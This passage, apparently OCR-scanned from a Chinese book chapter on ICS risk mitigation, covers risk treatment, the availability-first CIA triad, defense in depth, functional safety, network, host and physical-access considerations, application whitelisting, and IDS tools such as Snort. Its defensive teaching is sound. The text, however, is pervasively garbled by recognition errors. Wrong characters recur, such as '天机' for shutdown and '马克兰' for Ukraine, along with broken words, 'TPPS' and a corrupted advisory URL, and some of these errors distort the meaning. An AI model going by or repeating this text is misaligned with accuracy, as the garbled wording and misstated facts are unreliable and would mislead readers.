得 以 验证 ， 并 采用 可 复 现 、 标 准 化 的 方式 加 以 分 析 。 其 得 出 的 结果 是 一 个 经 过 优先 级 排序 的 风险 列表 。 而 缓解 策略 则 是 机 构 将 如 何 对 这 些 风险 进行 处 理 的 规划 。 


在 核心 层面 ， 有 四 种 基本 方式 来 应 对 风险 ， 它 们 分 别 是 接受 、 规 避 (忽略 ) 、 缓 解 或 者 转移 。 所 有 这 四 种 应 对 风险 的 方式 最 终 都 将 成 为 商业 决策 。 因 此 ， 风 
他 缓解 策略 很 大 程度 上 也 是 基于 商业 角度 考虑 的 。 通 囊 当 一 个 机 构 认 为 缓解 某 个 风险 的 成 本 将 超过 风险 本 身 时 ， 需 要 提请 书面 论证 才能 正式 地 接受 该 风险 。 而 规 
避 某 个 风险 只 需要 对 其 简单 地 忽略 即 可 。 不 过 忽略 某 个 已 经 识别 出 的 风险 并 不 是 一 个 很 好 的 策略 ， 然 而 用 户 、 机 构 甚 至 国家 却 经 常 这 样 做 。 通 过 实施 控制 或 者 部 
署 对 抗 措施 ， 可 以 将 风险 暴露 降低 到 一 个 可 接受 的 水 平 ， 从 而 缓解 风险 。 最 后 ， 风 险 还 可 以 转移 。 这 往往 是 通过 购买 保险 来 做 到 的 。 人 们 和 公司 为 了 确保 他 们 能 
够 应 对 物理 世界 中 的 风险 而 为 自己 购买 保险 ， 现 在 在 IT 领域 甚至 工控 系统 领域 也 已 经 开始 购买 网 络 保险 (cyberinsurance) 了 。 我 们 将 在 本 章 随后 讨论 这 个 问 


题 。 


风险 不 可 能 完全 被 缓解 。 机 构 必 须 确定 哪 种 水 平 的 风险 是 可 以 接受 的 ， 以 及 同 缓解 风险 所 需 的 成 本 相 比 ， 需 要 将 风险 降低 到 什么 水 平 才 可 以 接受 。 


10.2 工控 系统 的 特殊 风险 要 素 


我 们 在 详细 地 讨论 这 项 策略 之 前 ， 需 要 先 谈 一 些 安全 概念 ， 它 们 在 工控 系统 网 络 安 全 领域 中 的 合 义 与 在 公司 IT 网 络 安全 领域 中 的 含义 略 有 不 同 。 这 些 概 念 决 
定 了 工控 系统 网 络 中 的 操作 人 员 和 防护 人 员 如 何 看 竺 安全 问题 以 及 他 们 在 日 常 业务 工作 中 如 何 应 对 风险 。 


10.2.1 机密 性 、 完 整 性 和 可 用 性 


CIA 三 元 模型 在 第 4 章 中 已 介绍 过 了 ， 该 模型 包括 三 个 基本 概念 (机密 性 、 完 整 性 和 可 用 性 ) ， 这 些 概念 是 在 上 系统 中 审视 安全 问题 的 一 种 方式 。 要 记 住 的 
是 ， 在 工控 系统 领域 中 CIA 三 元 模型 则 被 倒转 过 来 ， 因 为 可 用 性 最 为 重要 : 


工业 
可 用 性 
完整 性 
机 密 性 


企业 


ULETE E 
完整 性 


可 用 性 


强调 一 下 ， 这 三 个 概念 都 很 重要 。 但 是 在 控制 系统 领域 中 ， 可 用 性 比 其 他 两 个 概念 更 为 重要 。 因 为 如 果 操 作 员 失去 了 对 控制 系统 的 监控 和 控制 ， 唯 一 的 选择 
就 是 天 机 ， 无 论 是 手动 天 机 还 是 应 急 天 机 。 而 意外 关机 将 会 导致 生产 率 降低 、 成 本 增加 ， 并 且 极 有 可 能 引起 人 身 伤亡 事故 。 这 种 思维 方式 与 通常 |T 运 营 的 思维 方 
式 不 同 。 而 且 ， 工 控 系 统 设施 还 可 能 会 排 定 年 度 停工 期 。 这 一 现实 情况 也 会 对 运营 决策 产生 影响 ， 而 攻击 者 了 解 这 些 将 更 有 利于 他 们 开展 攻击 。 例 如 ， 在 石油 与 
天 然 气 领域 中 ， 某 一 个 大 型 设施 每 小 时 产量 价值 数 十 万 美元 ， 并 且 其 产能 受到 合同 的 法 律 约束 ， 因 为 合同 上 明确 规定 了 油气 产品 的 产 出 必须 持续 不 断 。 因 此 ， 计 
划 外 停工 将 造成 生产 率 降 低 、 法 律 制裁 甚至 人 员 伤 亡 等 极端 严重 的 后 果 。 类 似 地 ， 友 电厂 和 变电站 为 数 百 万 人 口 提供 电力 ， 而 某 次 计划 外 的 停工 则 可 能 引起 整个 
城市 甚至 某 片 区 域 的 大 范围 断 电 。 束 像 第 1 章 中 提 过 的 那样 ， 我 们 经 历 过 2003 年 美国 东海 岸 的 大 规模 断 电 事件 ，2015 年 马克 兰 电 网 遭受 网 络 攻 击 也 导 怪 了 大 规模 
新 电 。 


最 后 需要 考虑 的 一 点 是 ， 完 整 性 受 损 会 导致 可 用 性 的 降低 。 因 此 ， 在 工控 系统 版 本 中 的 “AlC” 三 元 模型 中 ， 完 整 性 经 常 紧 随 可 用 性 之 后 ， 位 居 次 席 。 对 此 下 
一 次 提出 ， 工 控 系 统 的 运营 不 同 于 其 他 IT 活动 ， 不 能 同等 看 待 。 因 为 完整 性 受 损 也 可 能 会 像 可 用 性 降低 一 样 ， 导 致 系统 完全 关机 。 例 如 ， 如 果 操作 员 对 于 他 们 在 
控制 室内 接收 到 的 输出 数据 内 容 不 确定 ， 他 们 融 搞 不 清楚 当前 状况 。 而 如 果 该 输出 是 操作 过 程 中 的 天 键 因素 ， 那 么 唯一 的 选择 融 是 天 机 。 其 他 一 些 天 键 输出 实例 
还 包括 管道 中 不 同 流量 值 的 位 置 ,或 者 是 核电 站 冷却 塔 的 水 势 等 等 。 


最 后 ， 在 IT 系 统领 域 和 工控 系统 领域 ， 思 维 模式 上 最 重要 的 不 同 点 就 是 功能 安全 (safety) ! 


10.2.2 ”纵深 防御 


纵深 防御 (Defense-in-Depth， 也 称 为 layered defense， 即 分 层 防 御 ) 是 军事 概念 在 IT 领域 中 的 应 用 。 这 个 词 现在 也 经 常 出 现在 工控 系统 领域 当中 。 在 军 
事 方面 ， 纵 深 防御 是 指 一 系列 彼此 之 间 相 互 文 持 的 防御 措施 ， 用 于 拖延 政 方 的 推进 速度 ， 同 时 给 予 防御 方 更 多 的 时 间 来 做 出 响应 以 阻止 攻击 。 我 们 也 都 听 过 “所 
有 边界 都 会 被 突破 ”、“ 对 于 内 部 网 络 ， 黑客 们 想 进 丈 进 ” 这 些 老生 常 谈 。 在 物理 和 网 络 安 全 领域 ， 这 些 说 法 的 确 没 错 (诚然 ， 在 许多 情况 下 攻击 者 们 需要 足够 
的 时 间 和 资源 才能 够 实现 入 侵 ) 。 当 防御 边界 遭 到 破坏 或 者 防御 措施 受到 影响 时 ， 纵 深 防御 拖延 了 攻击 者 的 攻击 进展 ， 从 而 给 予 防御 者 更 多 的 时 间 做 出 反应 。 


另 一 种 带 见 的 思路 是 ， 给 予 足 够 的 威 慨 束 能够 阻止 水 平 较 低 的 攻击 者 〈“ 脚 本 小 子 ”、 行 业 新 手 或 者 其 他 技术 能 力 较 弱 的 黑客 ) 开展 进一步 的 攻击 尝试 。 但 
这 种 思路 存在 经 不 起 推 襄 ， 因 为 我 们 很 难 去 预测 不 同 水 平 的 攻击 者 的 动机 、 决 心 和 资源 ， 尤 其 是 那些 拥有 大 把 时 间 而 没有 其 他 事情 可 做 的 黑客 们 。 而 底线 是 在 
于 ， 无 论 读者 是 把 攻击 者 看 作 误 入 上 收 途 的 青少年 ， 还 是 已 经 部 署 了 “ 坚 不 可 挫 的 纵深 防御 末日 之 墙 ”， 永 远 都 不 要 低估 攻击 者 。 


优秀 的 纵深 防御 策略 不 应 该 是 一 系列 拙 务 安全 措施 的 组 合 ， 也 不 是 将 对 抗 措 施 部 署 得 越 多 越 好 。 我 们 经 常会 友 现 有 些 机 构 采 用 了 一 组 或 一 系列 薄弱 的 安全 措 
施 ， 然 后 就 将 其 称 为 纵深 防御 。 若 干 个 低级 的 安全 措施 相 革 加 并 不 等 同 于 具备 较 高 的 安全 等 级 。 这 样 做 反而 会 带 来 很 多 安全 注 弱 环节 。 例 如 ， 审 计 员 或 某 项 标准 
协议 可 能 会 要 求 安 疼 内 部 防火 墙 从 而 将 业务 网 络 和 控制 系统 网 络 隔离 开 来 。 那 么 安 半 了 防火 墙 ， 融 算 达 到 了 审计 员 或 者 标准 的 要 求 。 但 是 ， 仪 仅 安 半 了 防火 墙 并 
不 代表 正确 地 配置 了 防火 墙 规 则 。 防 火 墙 的 安 妆 只 是 最 简单 的 部 分 ， 制 订 可 靠 的、 安全 的 防火 墙 规则 集 才 是 真正 灰 手 的 地 方 。 纵 深 防 御 是 一 种 非 囊 好 的 做 法 ， 但 
是 现实 中 的 实施 过 程 通常 有 所 欠缺 。 第 1 章 介绍 的 普 渡 模型 的 核心 束 是 纵深 防御 策略 。 忌 体 上 来 说 ， 纵 深 防 御 是 个 特别 好 的 策略 ， 但 是 如 果 针 对 性 不 强 ， 其 效率 和 
成 本 效益 就 会 大 打折 扣 。 


10.2.3 ”功能 安全 


正如 前 文 所 谈 到 的 ， 工 控 系 统领 域 与 |T 领 域 存在 区 别 的 第 三 个 方面 在 于 功能 安全 (Safety) 以 及 功能 安全 系统 的 重要 性 不 同 。 这 是 因为 工控 系统 环境 中 出 于 
人 身 安全 方面 的 考虑 使 其 复杂 度 得 以 进一步 提高 。 拥 有 工业 控制 系统 的 设施 其 工作 环境 可 能 非常 危险 。 一 旦 系统 出 现 故 障 ， 员 工 束 有 可 能 出 现 伤亡 ， 更 不 要 志 
工控 系统 设施 还 面临 着 遭受 大 规模 破坏 行为 的 潜在 风险 。 此 外 ， 医 疗 卫生 领域 也 是 人 类 生命 直接 受到 IT 系 统 影 响 的 少数 几 个 IT 领 域 之 一 。 


这 些 功能 安全 系统 中 的 许多 系统 都 与 网 络 建立 了 连接 ， 并 且 是 常规 控制 系统 网 络 中 的 一 部 分 。 功 能 安全 系统 可 能 是 采用 机 械 自 动 化 实现 的 ， 但 其 他 系统 则 是 
由 PLC 控 制 的 ， 而 且 在 很 多 情况 下 ， 相 同类 型 的 PLC 还 用 于 运营 功能 的 控制 。 此 外 ， 这 些 PLC 还 通常 与 控制 生产 的 PLC 连 接 在 相同 的 网 络 中 。 这 丈 意 味 着 功能 安全 
是 运行 工控 系统 网 络 的 机 构 里 最 根本 和 最 重要 的 部 分 。 虽 然 也 有 例外 ， 但 是 大 多 数 情 况 下 ， 工 控 系 统 环境 中 高 度 重视 功能 安全 的 氛围 非常 浓厚 ， 并 强烈 影响 着 一 
线 职员 看 待 运营 过 程 中 方方面面 问题 的 方式 。 


10.3 ”针对 工控 系统 风险 缓解 指 施 的 考量 
当 对 工控 系统 和 IT 系统 风险 缓解 的 解决 方案 进行 比较 时 ， 需 要 对 工控 系统 所 特有 的 几 个 关键 差异 予以 认真 考虑 。 如 果 某 些 解决 方案 应 用 于 工控 系统 的 方式 同 
应 用 于 IT 网 络 的 方式 相同 ， 就 有 可 能 对 生产 和 (或 ) 功能 安全 带 来 负面 影响 。 本 节 中 讨论 的 这 些 关 键 考量 因素 可 以 分 为 以 下 三 类 : 
. 工控 系统 网 络 方面 的 考量 
. 工控 系统 基于 主机 方面 的 考量 


` 工控 系统 物理 访问 方面 的 考量 


10.3.1 “工控 系统 网 络 方面 的 考量 


在 大 多 数 现代 工控 系统 环境 中 ， 最 重要 的 莫 过 于 计算 机 网 络 了 。 网 络 将 流量 从 一 台 设 备 传输 到 另外 一 台 设 备 ， 例 如 人 机 界面 同 PLC 之 间 进 行 通信 来 引导 PLC 执 
行 某 一 功能 。 昌 然 无 论 是 IT 环境 还 是 工控 系统 环境 都 依赖 于 计算 机 网 络 ， 但 是 当 联网 设备 与 工控 系统 环境 或 设备 之 间 进 行 通信 时 ， 有 许多 特殊 因素 需要 考虑 。 
空 系统 网 络 方面 的 部 分 考量 因素 包括 : 


: 内 部 地 址 空间 用 法 (例如 使 用 RFC1918 私 有 地 址 空间 ) ”在 工控 系统 环境 中 请 勿 使 用 仅 通过 互联 网 就 可 以 路 由 到 的 IP 地 址 。 
. 隔离 网 络 (Air-gapped networks) ”物理 隔离 并 不 意味 着 不 会 受到 攻击 影响 ， 反 而 可 能 会 对 安全 现状 产生 错觉 


- 双 宿 网 络 (Dual-homed networks) ”在 工控 系统 环境 中 ， 工 程 师 站 经 常会 同时 既 连 接 到 工控 系统 网 络 ， 又 连接 到 其 他 网 络 ， 比 如 业务 网 络 。 但 是 这 种 配 


置 方式 往往 会 前 弱 其 他 安全 防护 措施 ， 例 如 网 络 隔 离 就 可 能 会 受到 双 窒 网 络 的 影响 。 
. 数据 网 络 和 进出 工控 系统 网 络 的 通信 路 径 ”应 该 严格 限制 对 工控 系统 环境 的 访问 ， 工 控 系 统 资产 或 设备 也 应 该 禁止 访问 互联 网 。 


. 网 络 安全 设备 (人 代理、 防火墙 、IDS/IPS) ”我 们 需要 采用 防火 墙 进 行 网 络 隔离 ， 也 需要 IDS 进 行 网 络 异 常 检 测 ， 但 是 过 于 严格 和 (或 ) 过 于 被 动 的 安全 措 
施 却 可 能 给 生产 环境 带 来 不 利 影响 。 


- 联网 的 工控 系统 设备 (Siemens S7-1200、MicroLogix1100 等 ) “基于 IP 协 议 的 工控 系统 设备 在 设计 上 非常 不 安全 ， 并 且 很 有 可 能 无 法 经 受 住 传统 IT 环境 
中 严格 的 测试 ， 例 如 网 络 扫描 。 


` 联网 的 工控 系统 程序 〈( 人 机 界面 、 工 业 实时 历史 数据 库 、 设 备 编程 软件 等 ) 《这些 应 用 程序 包含 了 许多 易于 利用 的 漏洞 ， 或 者 可 能 削弱 其 他 安全 策略 的 设 
计 “ 特 性 ”。 例 如 ， 某 些 程序 可 能 会 请 求 防火 墙 开 放大 范围 的 端口 以 保证 程序 数据 通过 防火 墙 。 


读者 可 能 还 会 询问 以 下 这 些 问题 : 工控 系统 网 络 还 会 涉及 哪些 内 容 ? 工控 系统 网 络 会 连接 到 互联 网 上 吗 ? 工控 系统 网 络 上 的 设备 会 路 由 到 互联 网 上 吗 ? 是 
使 用 了 不 必要 (或 者 有 潜在 危害 ) 的 应 用 程序 、 协 议和 设备 ”是 否 仓 在 隐蔽 或 者 多 余 的 连接 ? 


10.3.2 ”工控 系统 基于 主机 方面 的 考量 


可 以 说 ， 网 络 中 的 主机 是 需要 考虑 的 最 重要 的 一 个 方面 。 工 控 系 统 网 络 中 的 主机 可 以 包括 人 机 界面 、 工 业 实时 历史 数据 库 系统 或 者 跳板 机 等 。 对 于 任何 运转 
正常 的 大 型 工控 系统 环境 而 言 ， 都 需要 有 一 个 网 络 在 设备 节点 之 间 传 输 数 据 。 但 是 也 正 是 因为 这 些 关 键 功能 ， 在 部 署 或 者 维护 工控 系统 网 络 中 的 主机 时 ， 需 要 将 
工控 系统 网 络 的 一 些 特 定 需 求 考虑 在 内 。 基 于 主机 的 考量 因素 包括 : 


. 补丁 策略 大 多 数 工控 系统 环境 都 无 法 像 传 统 的 IT 系统 环境 那样 经 常 定期 发 布 补丁 。 此 外 ， 其 中 许多 补丁 也 需要 通过 厂商 的 认可 ， 以 免 给 工控 系统 设备 带 


. 重启 安排 ”机 器 多 久 可 以 重启 一 次 ? 由 于 补丁 更 新 后 经 常会 要 求 重启 ， 而 大 多 数 工控 系统 资产 不 可 能 像 传统 IT 资产 那样 频繁 重启 或 者 临时 重启 。 


- 备份 策略 ”主机 文件 和 人 机 界面 的 配置 或 项 目 文件 有 没有 进行 定期 自动 备份 ?” 工控 系统 的 主机 和 设备 中 包含 对 于 安全 过 程 、 生 产 和 监管 报告 而 言 非常 关键 
的 数据 。 确 保 采 用 适当 的 方式 对 这 些 数据 进行 定期 备份 至 关 重 要 。 


. 主机 部 署 方式 “主机 需要 安装 哪些 微软 补丁 包 ? 工控 系统 应 用 程序 对 于 其 所 在 主机 中 安装 的 操作 系统 与 补丁 包 非 常 敏 感 ， 并 且 安 装 过 程 必 须 严 格 按照 厂商 
的 建议 进行 。 
. 故障 转移 程序 ”诸如 人 机 界面 之 类 的 关键 主机 中 需要 什么 样 的 故障 转移 程序 呢 ? 系统 正常 运行 时 间 和 可 用 性 对 于 工控 系统 环境 来 说 非常 重要 。 确 保 拥 有 有 


效 的 故障 转移 机 制 和 程序 是 防止 被 入 侵 的 主要 系统 遭受 拒绝 式 服务 攻击 的 重要 防护 手段 。 


. 使 用 的 操作 系统 (Windows XP、Windows7 等 ) 。 在 难以 定期 更 新 和 升级 的 工控 系统 中 ， 熟 悉 所 使 用 的 操作 系统 对 于 制订 风险 缓解 策略 来 说 非常 重要 。 
比方 说 ， 必 须 了 解 环境 中 当前 所 使 用 的 操作 系统 版 本 中 存在 的 漏洞 ， 尤 其 是 那些 已 经 停止 维护 的 操作 系统 ， 例 如 Windows XP. 


10.3.3 ”工控 系统 物理 访问 方面 的 考量 


从 传统 上 来 看 ， 对 工控 系统 环境 的 物理 访问 一 直 以 来 都 比较 简单 而 且 通 党 都 是 开放 的 。 由 于 要 考虑 到 设备 放置 的 地 点 ， 因 此 轻松 地 访问 到 设备 并 对 其 进行 维 
护 是 非常 必要 的 。 实 现 对 硬件 的 快速 访问 可 以 帮助 确保 设备 顺畅 、 高 效 地 运转 。 


但 是 ， 能 够 方便 地 访问 到 人 机 界面 主机 也 可 能 使 得 攻击 者 可 以 随意 插 拔 U 盘 并 安装 屎 意 代码 。 由 于 存在 这 种 类 型 的 威胁 ， 因 此 在 工控 系统 环境 中 部 署 物理 设备 
时 ， 应 当 考 虑 以 下 要 素 : 


对 部 署 有 IT 基础 设施 的 机 架 的 访问 ， 这 些 IT 基础 设施 对 于 工控 系统 环境 的 正常 运转 非常 关键 ; 
` 对 工控 系统 环境 运转 非常 关键 的 非 IT 基 础 设施 的 访问 ; 

. 对 出 入 口上 锁 ; 

. 对 部 署 设备 的 机 架 上 锁 ; 

对 工控 系统 设备 的 物理 访问 ; 

对 工控 系统 IT 计 和 工 机 的 物理 访问 ; 


- 双 因 子 认 证 的 感应 卡 。 


10.4 漏洞 利用 工具 、 戌 胁 和 漏洞 


纵 观 全 书 ， 我 们 讨论 了 许多 威胁 、 漏 洞 和 漏洞 利用 工具 ， 这 些 都 是 实施 一 次 成 功 攻击 所 必需 的 重要 组 成 部 分 。 现 在 ， 可 以 把 这 些 组 件 当成 堆 烧 三 要 素 (fire 


攻击 


triangle， 燃 烧 所 需要 具备 的 条 件 ) ， 从 而 得 到 攻击 三 要 素 ， 这 一 概念 也 经 常用 于 工控 系统 安全 培训 |: 


火 的 燃烧 需要 三 个 要 素 : 空气 、 热 量 和 燃料 。 缺 少 任意 一 个 要 素 都 不 可 能 将 火烧 起 来 。 与 之 类 似 ， 为 了 缓解 一 次 成 功 攻 击 所 市 来 的 风险 ， 只 需要 去 掉 攻 击 三 
要 素 中 的 任何 一 个 要 素 一 漏洞 利用 工具 、 威 胁 或 漏洞 ， 殊 可 以 降低 遭受 攻击 的 风险 。 当 安全 人 员 向 操作 人 员 和 解释 一 次 成 功 攻击 的 组 成 时 ， 燃 烧 三 要 素 是 一 种 非常 
有 效 的 理解 方式 。 
10.4.1 ”漏洞 利用 工具 的 清除 


虽然 在 现实 中 完全 清除 漏洞 利用 工具 实际 上 并 不 可 行 ， 但 是 了 解 需要 实施 哪些 控制 措施 ， 以 及 如 何 部 署 这 些 控制 措施 最 有 效 ， 能 够 帮助 用 户 将 风险 缓解 策略 
的 效果 最 大 化 。 


10.4.2 威胁 的 清除 


和 前 者 类 似 ， 清 除 现实 中 的 威胁 也 是 不 大 可 能 的 ， 除 了 在 内 部 威胁 事件 中 解聘 事件 责任 工作 人 员 的 情况 (当然 了 ， 不 能 采用 阿诺德 ` 施 瓦 平 格 那样 的 暴力 方 
式 ) 。 然 而 ， 即 使 开除 员工 也 不 会 消除 威胁 ， 而 可 能 只 是 对 威胁 重新 进行 了 分 类 一 内 部 威胁 转变 为 了 熟知 内 部 情况 的 外 部 威胁 ， 这 种 情况 也 好 不 到 哪儿 去 ,没准 
儿 还 会 更 加 糟糕 。 了 解 这 些 威胁 是 如 何 运作 的 ， 可 以 知道 攻击 者 会 在 什么 时 候 以 及 采用 什么 方式 来 友 起 攻击 ， 从 而 实现 风险 缓解 的 最 优化 部 署 。 战 术 、 技 术 和 程 
Fr (Tactics, Techniques and Procedures， 也 可 记 为 TPPS) 是 物理 领域 和 网 络 安全 领域 中 的 常用 术语 。 无 论 个 人 还 是 机 构 ， 其 观念 都 需要 紧 跟 威胁 的 TPPS。 
但 愿 这 样 做 能 够 帮助 人 们 从 容 地 应 对 威胁 。 


10.4.3 ”漏洞 的 清除 


排除 或 阻止 对 漏洞 的 访问 是 在 攻击 三 要 素 场 景 中 唯一 真正 的 直接 控制 方式 。 清 除 漏洞 主要 有 两 种 方法 : 
1. 限 制 对 系统 或 漏洞 的 访问 

2. 清 除 ( 移 除 ) 漏洞 

1. 限 制 对 系统 或 漏洞 的 访问 


按理 说 ， 攻 击 者 如 果 无 法 获得 (物理 或 逻辑 上 的 ) 系统 或 漏洞 访问 权限 ， 那 么 他 就 无 法 进行 漏洞 利用 。|IT 系 统 中 用 于 限制 访问 权限 的 办 法 通常 也 同样 适用 于 
工控 系统 环境 。 但 是 ， 必 须 谨慎 对 待 这 些 方法 在 工控 系统 环境 中 的 实施 方式 。 例 如 ， 如 果 在 错误 的 时 间 限 制 了 错误 的 网 络 流量 ， 那 么 就 可 能 造成 生产 过 程 的 中 
止 ， 功 能 安全 也 可 能 会 受到 影响 。 并 非 所 有 的 标准 网 络 控 制 措施 都 适用 于 工控 系统 资产 。 


(1) (限制 权限 ) 配置 


最 小 权限 (least permission) 和 最 少 路 由 (least route) 是 所 有 IT 网 络 中 的 核心 理念 。 运 曹 网 络 也 是 如 此 。 在 这 里 的 思路 就 是 ， 只 赋予 某 个 进程 、 某 个 人 或 
者 某 款 软件 设备 执行 特定 功能 所 需 的 最 小 访问 权限 和 最 短 的 网 络 访问 路 径 。 一 切 越 简单 越 好 。 


(2) 应 用 程序 或 进程 的 白 名 单 与 黑 名 单 


应 用 程序 白 名 单 和 黑 名 单 是 遍布 全 球 的 众多 机 构 广 泛 采 用 的 防护 机 制 。 应 用 程序 白 名 单 (application whitelisting) 就 是 剥夺 未 授权 程序 执行 能 力 的 过 程 。 
这 种 防御 形式 能 够 通过 阻止 未 授权 程序 或 软件 的 运行 来 实现 对 系统 的 保护 ， 比 如 阻止 恶意 代码 的 运行 。 应 用 程序 白 名 单 是 用 户 或 者 系统 可 以 运行 的 所 有 程序 的 一 
个 列表 。 该 列表 由 管理 员 维 护 并 需要 经 常 对 其 有 效 性 进行 审核 。 在 工控 系统 环境 内 ， 应 用 程序 白 名 单 在 阻止 恶意 代码 或 BitTorrent 之 类 的 软件 运行 时 效果 显著 。 


应 用 程序 日 名 单 的 另 一 面 则 是 黑 名 单 。 应 用 程序 黑 名 单 (application blacklisting) 是 指 禁 止 指定 列表 中 程序 执行 的 过 程 。 同 应 用 程序 日 名 单 类 似 ， 黑 名 单 
的 作用 也 是 阻止 不 必要 的 软件 的 运行 。 同 样 ， 在 工控 系统 环境 中 ， 采 用 应 用 程序 黑 名 单 可 以 有 效 地 阻止 特定 程序 运行 。 


关于 应 用 程序 日 名 单 与 黑 名 单 的 探讨 


许多 专家 认为 应 用 程序 日 名 单 由 于 难于 管理 并 且 太 过 复杂 ， 所 以 其 有 效 性 难以 保证 。 而 由 于 健壮 、 全 面 的 列表 难于 维护 和 获取 ， 因 此 应 用 程序 黑 名 单 也 无 法 
确保 面面俱到 。 部 分 专家 还 认为 黑 名 单 与 白 名 单 非常 容易 规避 ， 仪 仅 只 需 简单 地 改动 程序 中 的 几 个 字 忆 就 可 以 令 程 序 执行 。 此 外 ， 黑 日 名 单 的 误 报 率 和 漏 报 率 也 
需要 注意 。 某 些 情 况 下 ， 误 报 将 阻止 许可 程序 的 有 效 运 行 ， 导 致 程序 无 法 操作 。 


基于 上 述 原因 ， 当 考虑 采用 应 用 程序 黑 名 单 和 (或 ) 白 名 单 时 ， 有 些 特殊 考量 需要 考虑 在 内 ， 可 以 首先 试 着 回答 以 下 问题 : 

.如何 对 白 名 单 进行 维护 ? 

` 如何 对 黑 名 单 进行 维护 ? 

采用 哪个 列表 来 构建 初始 黑 名 单 和 (或 ) 白 名 单 ? 

` 消除 误 报 的 程序 包括 哪些 内 容 ? 

` 消除 漏 报 的 程序 包括 哪些 内 容 ? 

当 某 个 应 用 程序 被 看 作 是 关键 程序 时 ， 如 何 快 速 构 建 规则 进行 部 署 ? 

(3) 工控 系统 网 络 协议 监测 

这 一 相对 模糊 的 范畴 ， 涵 盖 了 许多 基础 知识 ， 必 要 时 ， 系 统 和 网 络 管理 员 只 有 在 工控 系统 工程 师 的 帮助 下 才能 够 妥善 地 解决 好 出 现 的 问题 。 


有 很 多 方法 可 能 会 对 系统 安全 造成 影响 ， 其 中 之 一 融 是 对 系统 之 间 通 信 过 程 中 采用 的 协议 进行 干扰 。 数 十 年 来 ， 畸 形 数据 包 已 经 造成 了 无 数 服务 器 的 朋 涡 。 
虽然 数据 包 最 终 只 是 由 目的 服务 器 中 的 一 小 段 代码 进行 解析 ， 但 这 并 不 是 唯一 可 以 部 署 对 抗 措施 以 应 对 攻击 的 地 方 。 防 火 墙 、 入 侵 检测 系统 、 入 侵 防 御 系 统 ， 甚 
至 仪 仪 是 运行 ijptables 防 火 墙 的 某 一 台 Linux 终 端 都 可 以 在 恶意 数据 包 抵达 目的 地 之 前 实现 对 恶意 数据 包 的 监测 与 (或 ) 过 滤 。 要 做 到 这 一 点 ， 了 解 协 议 的 细节 信 
息 是 非常 必要 的 。 


网 络 管理 员 ， 尤 其 是 那些 负责 防火 墙 维护 的 管理 员 ， 通 常 需要 对 常用 网 络 协 议 进行 深入 了 解 。 在 现代 操作 系统 中 ， 诸 如 TCP 和 IP 协 议 之 类 的 常用 协议 多 年 来 
已 经 进行 了 完备 的 测试 并 完成 了 加 固 。 然 而 出 于 某 些 原因 ， 很 多 工控 系统 设备 中 TCP/YIP 协 议 栈 的 处 理 代 码 却 并 不 够 健壮 。 尽 管 暴露 在 现实 世界 中 的 时 间 越 来 越 
豆 ， 但 是 偶尔 还 是 会 出 现 一 个 涉及 畸形 数据 包 的 老 派 漏洞 ， 利 用 该 漏洞 攻击 者 就 可 以 在 工控 系统 设备 上 执行 任意 代码 。 (CVE-2014-0783 就 是 个 很 好 的 例 
iE, https://web.nvd.nist.gov/view/vuln/detail?vulnid=CVE-2014-0783) 。 即 使 程序 员 可 能 一 直 在 对 问题 进行 修复 ， 但 网 络 管理 员 也 还 有 其 他 设备 需要 保 
护 。 因 此 ， 在 网 络 的 入 口 点 部 署 一 套 设备 来 对 恶意 特征 码 进 行 检测 是 个 明智 的 决定 。 


其 中 一 种 用 来 检测 恶意 特征 码 的 设备 束 是 Snort (https://www.snort.org) ,虽然 它 并 不 是 最 新 的 选项 但 是 非常 可 靠 。 如 果 想 实现 对 进入 网 络 流 量 的 完全 控 
制 ， 那 么 用 户 可 以 构建 自己 的 特征 码 ， 或 者 利用 Snort 社 区 成 员 分 享 的 经 过 验证 的 特征 码 。Snort 系 统 也 提供 有 订阅 服务 ， 在 “免费 ”发 布 特征 码 之 前 优先 为 订阅 
用 户 发 送 新 特征 码 (他 们 总 归 也 是 要 赚 点 钱 的 对 不 对 ) 。 


如 果 Snort 系 统 不 合适 ， 还 有 Suricata (http://oisf.net/suricata/) 、Sagan (https://quadrant-sec.com/sagan log analysis engine/) 等 多 种 软件 可 供 
选择 ， 这 些 软件 各 有 所 长 。 网 络 管 理 员 是 软件 的 最 终 用 户 ， 可 以 让 他 们 从 中 选取 一 个 既 能 够 完成 任务 使 用 起 来 又 较为 简单 的 软件 。Security 
Onion (https://security-onion-solutions.github.io/security-onion/) 是 一 套 Linux 的 发 行 版 本 ， 其 中 已 经 包含 了 很 多 类 似 的 工具 。 使 用 Security Onion 能 够 直 
接 找 到 适用 目标 系统 的 工具 并 加 以 利用 ， 从 而 帮助 用 户 节 省 大 量 时 间 。 


正如 工控 系统 设备 中 有 些 TCP/IP 协 议 枝 并 不 可 靠 ， 而 工控 系统 协议 的 情况 可 能 更 加 糟糕 。 究 其 原因 ， 很 可 能 是 因为 很 多 “好 奇 ”的 人 们 接触 不 到 工控 协议 ， 
从 而 无 法 对 工控 协议 展开 深入 的 安全 研究 。 这 一 问题 至 今 仍然 人 存在， 而且 其 履 盖 面 非 党 广 ， 只 要 浏览 一 下 https:/WVics-cert.us-cert.goWadvisories 这 个 网 址 融 了 解 
了 。 在 页 面 搜索 栏 中 输入 “DNP3” 或 “Modbus”， 再 或 者 输入 用 户 所 使 用 的 任何 一 个 协议 的 名 称 ， 在 搜索 结果 中 都 会 友 现 这 些 协 议 存 在 一 大 堆 漏 洞 。 这 种 情况 
下 ， 如 果 网 络 管理 员 只 熟悉 传统 的 IT 协议 ， 那 么 他 们 可 能 还 需要 再 温习 一 下 这 些 工控 系统 协议 的 具体 内 容 。 而 IT 协议 和 工控 系统 协议 漏洞 的 对 抗 措施 则 是 一 样 的 。 
无 论 最 新 的 漏洞 利用 代码 用 到 了 什么 漏洞 ， 都 需要 迅速 编写 出 特征 码 ， 然 后 等 着 程序 员 完 成 软件 的 漏洞 修复 。 


商业 入 侵 检 测 系统 与 入 侵 防御 系统 (IDS/IPS) 


使 用 入 侵 检测 系统 和 (或 ) 入 侵 防 御 系 统 是 抵御 恶意 代码 以 及 其 他 网 络 安全 相关 威胁 的 有 效 方法 。 入 侵 检测 系统 是 一 套 对 计算 机 网 络 或 系统 进行 监测 ， 以 查 
找 规则 集中 定义 的 恶意 行为 的 系统 或 软件 套件 。 入 侵 检 测 系统 不 会 主动 拦截 视 为 恶意 的 网 络 连接 ， 只 是 在 恶意 行为 被 触 皮 时 发 出 警告 。 


而 入 侵 防 御 系 统 ， 则 不 仅 要 识别 出 恶意 流量 ， 还 要 对 恶意 济 量 进行 拦截 。 当 来 自 东 一 网 络 或 主机 的 连接 被 视 作 恶意 连接 时 ， 入 侵 防 御 系 统 会 在 日 志 中 记录 该 
